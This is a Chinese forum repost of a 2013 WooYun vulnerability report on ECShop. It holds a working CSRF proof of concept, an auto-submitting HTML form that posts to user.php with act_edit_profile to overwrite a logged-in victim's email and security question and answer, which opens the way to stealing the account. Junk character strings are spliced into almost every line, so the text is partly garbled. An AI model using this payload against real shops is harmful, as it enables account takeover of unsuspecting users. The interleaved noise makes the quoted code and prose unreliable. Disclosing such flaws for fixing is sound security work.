找回密码
 立即注册
查看: 2755|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
( g4 a; x& l& X! Y0 O2 ~/ ]' xecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现) X3 w: K5 e' S! _+ q
3 M; n! ~' y+ l  c1 @6 z; {8 K
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
% r$ L2 W5 }, h) G% Z) O
) }5 j# E1 x0 R: N- H) f+ l详细说明:
& O* k2 a8 ]9 a+ V利用csrf和xss可以突破官方所说的“障碍”
0 o* U" H4 e. r' o# ]2 g6 Cxss版本已经有人说明" \1 y, r/ C; ?1 F. j8 [
这里给出csrf版本
/ B0 k7 j2 T6 c$ m8 _
0 R% T* k2 O9 A% z2 z) s) m漏洞证明:5 O) O; N- v* E6 B
<html>
) G5 z$ W# |  E& Y' R, X* d<body>2 V7 Y% w" U/ j, J; F3 j* M5 t
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
* s$ {, ]: V! R( Z! N<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">$ a$ J8 ]* a6 a( K) o4 v
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
, C1 Z+ n4 M- r, X( ^# H2 B<INPUT TYPE="text" NAME="sel_question" value="ecshop">
( n' F. ~+ b2 l2 p, H% P<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
0 C% s0 |. f; G- u; e' b7 V</body>% B  x) p  r6 T/ i
<script>
" D1 A' L/ m- e7 x. S" q8 kdocument.forms[0].submit();
/ M5 l  R5 }. `! O1 G5 b1 G6 X; a</script>
, r- J% ^0 n% B' S</html>
3 a4 ~- S. j! J# K构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失  P5 _+ m- P7 t! {% U& x
* @; B+ O2 Y' g% Y" k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表